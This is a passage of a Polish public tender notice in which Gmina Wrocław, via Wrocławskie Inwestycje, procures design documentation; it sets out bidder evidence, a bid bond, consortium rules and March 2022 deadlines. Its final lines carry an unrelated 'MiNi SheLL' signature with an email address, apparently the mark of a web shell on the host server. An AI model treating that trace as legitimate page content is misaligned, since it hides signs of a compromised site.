1 ustawy pzp przed udzieleniem zamówienia wzywa<br/>Wykonawcę lub wykonawców wspólnie ubiegających się o udzielenia zamówienia, których oferta została najwyżej oceniona do złożenia (także dla podmiotów udostępniających Wykonawcy zasoby) w<br/>wyznaczonym, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych<br/>aktualnych na dzień złożenia potwierdzających brak podstaw wykluczenia tj:<br/>1.1. W celu potwierdzenia uprawnień do reprezentowania danego podmiotu oraz w zakresie braku<br/>podstaw do wykluczenia w zakresie art. 109 ust. 1 pkt 4) ustawy pzp: odpisu lub informacji Krajowego<br/>Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzonych<br/>nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru<br/>lub ewidencji (z zastrzeżeniem art. 127 ust. 2 oraz 274 ust. 4 ustawy pzp)<br/>1.2. Oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1<br/>ustawy pzp w zakresie podstaw wykluczenia wskazanych przez Zamawiającego, sporządzone zgodnie<br/>z Załącznikiem nr 6 do IDW.<br/>2. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy<br/>pzp, dane umożliwiające dostęp do tych środków.<br/>3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczpospolitej Polskiej<br/>zamiast informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę<br/>lub miejsce zamieszkania potwierdzających odpowiednio, że nie otwarto likwidacji, nie ogłoszono<br/>upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego<br/>działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia procedury.<br/>4. Dokument, o którym mowa w pkt. 3 powyżej powinien być wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający zgodnie z art. 274 ust. 1 ustawy pzp przed udzieleniem<br/>zamówienia wzywa Wykonawcę lub wykonawców wspólnie ubiegających się o udzielenia zamówienia,<br/>których oferta została najwyżej oceniona do złożenia (także dla podmiotów udostępniających<br/>Wykonawcy zasoby) w wyznaczonym, nie krótszym niż 5 dni od dnia wezwania, podmiotowych<br/>środków dowodowych aktualnych na dzień złożenia potwierdzających brak podstaw wykluczenia oraz<br/>spełnienie warunków udziału w postępowaniu, o których mowa w pkt. 9 niniejszej IDW tj:<br/>1. Dotyczące zdolności technicznej lub zawodowej;<br/>1.1. Wykazu usług wykonanych przez Wykonawcę, o których mowa w pkt. 9.1.1.1. IDW sporządzony<br/>wg załącznika nr 4 do IDW, nie wcześniej niż w okresie ostatnich 10 lat liczonych wstecz od dnia, w<br/>którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz<br/>których usługi te zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy;<br/>Uwaga: Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług wykonanych w ramach<br/>konsorcjum, wykaz usług, dotyczy usług w których wykonaniu wykonawca ten bezpośrednio<br/>uczestniczył;<br/>1.2. Oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1<br/>ustawy pzp w zakresie podstaw wykluczenia wskazanych przez Zamawiającego, sporządzone zgodnie<br/>z Załącznikiem nr 6 do IDW.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca może w celu potwierdzenia spełniania warunków, o których mowa w pkt. 9 IDW w<br/>stosownych sytuacjach polegać na zdolnościach technicznych lub zawodowych lub sytuacji<br/>finansowej innych podmiotów udostępniający zasoby niezależnie od charakteru prawnego<br/>łączących go z nimi stosunków prawnych. Jeżeli Wykonawca w celu wykazania spełnienia<br/>warunków udziału w postępowaniu, o których mowa w pkt 9 IDW, będzie polegał na niezależnie od charakteru prawnego łączących go z nim stosunków prawnych, na potwierdzenie<br/>spełnienia warunków udziału w postępowaniu przedstawi on odpowiednie podmiotowe środki<br/>dowodowe dot. tych podmiotów, jakie Zamawiający żąda od Wykonawcy w zakresie, w jakim<br/>Wykonawca powołuje się na jego zasoby.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby,<br/>jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane.<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa, wraz z ofertą, zobowiązanie takiego podmiotu lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów.<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających przedłoży<br/>zobowiązanie podmiotu udostępniającego zasoby, które potwierdzi, że stosunek łączący<br/>wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych<br/>zasobów oraz określi w szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.<br/>W celu określenia zasobów podmiotu trzeciego tj. wiedzy i doświadczenia, potencjału<br/>technicznego, osób zdolnych do wykonania zamówienia lub zdolności finansowych lub<br/>ekonomicznych Zamawiający wymaga wskazania odpowiednio: imienia i nazwiska osób<br/>zdolnych do wykonania zamówienia, wartości środków finansowych; nazwy inwestycji/zadania,<br/>itp.<br/>Zamawiający oceni, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub<br/>zawodowe lub ich sytuacja finansowa pozwalają na wykazanie przez Wykonawcę spełniania<br/>warunków udziału w postępowaniu oraz zbada czy nie zachodzą wobec tego podmiotu<br/>przesłanki wykluczenia, które zostały przewidziane względem Wykonawcy.<br/>Zamawiający zgodnie z art. 274 ust. 1 ustawy pzp przed wyborem najkorzystniejszej oferty<br/>wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym<br/>terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych<br/>środków dowodowych, o których mowa w pkt 11.2.2 - 11.2.3. IDW, potwierdzających brak<br/>podstaw do wykluczenia podmiotów, o których mowa w pkt. 11.3. z udziału w postępowaniu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca składający ofertę zobowiązany jest wnieść wadium w wysokości 1000,00zł.<br/>Szczegóły dotyczące wadium znajdują się w Instrukcji dla Wykonawców (część I SIWZ) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni nie<br/>podlegać wykluczeniu oraz spełniać warunki udziału w postępowaniu i złożyć podmiotowe środki<br/>dowodowe, które to potwierdzą. Ponadto tacy Wykonawcy ustanawiają Pełnomocnika do<br/>reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden<br/>z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o<br/>którym mowa w pkt. 11.1.1. składa każdy z wykonawców. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. Zgodnie z art.117 ust. 3 i 4 ustawy pzp: w odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim<br/>przypadku, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio<br/>do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy sporządzone zgodnie z załącznikiem nr 5 do IDW.<br/>5. Postanowienia z punktów 1-4. mają również odpowiednie zastosowanie do wspólników spółki<br/>cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały określone w Części II<br/>Specyfikacji Warunków Zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-21 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> dnia zawarcia umowy, przy zachowaniu następujących terminów pośrednich:<br/>1.1. W terminie do 3 miesięcy od podpisania umowy, Wykonawca opracuje ostateczny projekt<br/>budowlany obejmujący projekt zagospodarowania terenu i BIOZ wraz z pozyskaniem decyzji i<br/>uzgodnień w zakresie niezbędnym do uzyskania decyzji administracyjnych umożliwiających<br/>rozpoczęcie robót budowlanych i przedłoży go Zamawiającemu, celem uzyskania akceptacji<br/>przez Komisję Oceny Dokumentacji Projektowej.<br/>1.2. W terminie do 7 miesięcy od daty zawarcia umowy Wykonawca zobowiązany jest do<br/>sporządzenia i przekazania Zamawiającemu ostateczności tych decyzji umożliwiających<br/>rozpoczęcie robót budowlanych.<br/>2. Powyższe terminy, mogą ulec zmianie w formie aneksu do umowy w przypadku przedłużenia<br/>się procesu uzgadniania przez jednostki elementów projektowych wymagających takiego<br/>uzgodnienia, ponad okres 30 dni od dnia dostarczenia przez Wykonawcę tych elementów<br/>projektowych, o ile to przedłużenie nie będzie wynikać z winy Wykonawcy, a także w innych<br/>przypadkach wskazanych w § 14 wzoru umowy.<br/>3. Wykonawca jest zobowiązany do pełnienia nadzoru autorskiego do czasu uzyskania<br/>pozwolenia na użytkowanie lub równoważnego dokumentu dla robót zrealizowanych na<br/>podstawie opracowania wykonanego według wzoru umowy. Planowany termin zakończenia<br/>robót i sprawowania nadzoru to 30.10.2023 r. W przypadku jednak, gdyby prace budowlane nie<br/>zakończyły się w terminie wskazanym w zdaniu pierwszym, Wykonawca jest zobowiązany do<br/>pełnienia nadzoru autorskiego do czasu ich zakończenia i uzyskania pozwolenia na użytkowanie<br/>lub równoważnego dokumentu, jeżeli będą wymagane.<br/>4. Zamawiający poinformuje Wykonawcę o zamiarze przystąpienia do realizacji robót objętych<br/>dokumentacją projektową co najmniej 30 dni przed oczekiwanym rozpoczęciem pełnienia<br/>nadzoru autorskiego.<br/><br/>UWAGA! Zamawiającym w niniejszym postępowaniu jest Gmina Wrocław, pl. Nowy Targ 1-8, 50-141 Wrocław, w imieniu i na rzecz której działają Wrocławskie Inwestycje Sp. z o. o. z siedzibą przy ul. Ofiar Oświęcimskich 36, 50-059 Wrocław na podstawie pełnomocnictwa Prezydenta Wrocławia. <br/><br/>1.11.1.) Nazwa podmiotu prowadzącego postępowanie: Wrocławskie Inwestycje Sp. z o.o.<br/>1.11.2.) Krajowy Numer Identyfikacyjny: 897-173-13-83<br/>Adres podmiotu prowadzącego postępowanie:<br/>1.11.3.) Ulica: Ofiar Oświęcimskich 36<br/>1.11.4.) Miejscowość: Wrocław<br/>1.11.5.) Kod pocztowy: 50-059<br/>1.11.6.) Województwo: dolnośląskie<br/>1.11.7.) Kraj: Polska<br/>1.11.8.) Lokalizacja NUTS 3: PL514 - Miasto Wrocław<br/>1.11.11.) Adres poczty elektronicznej: przetargi@wi.wroc.pl<br/>1.11.12.) Adres strony internetowej: http://www.wi.wroc.pl/html/przetargi.html

Creat By MiNi SheLL
Email: jattceo@gmail.com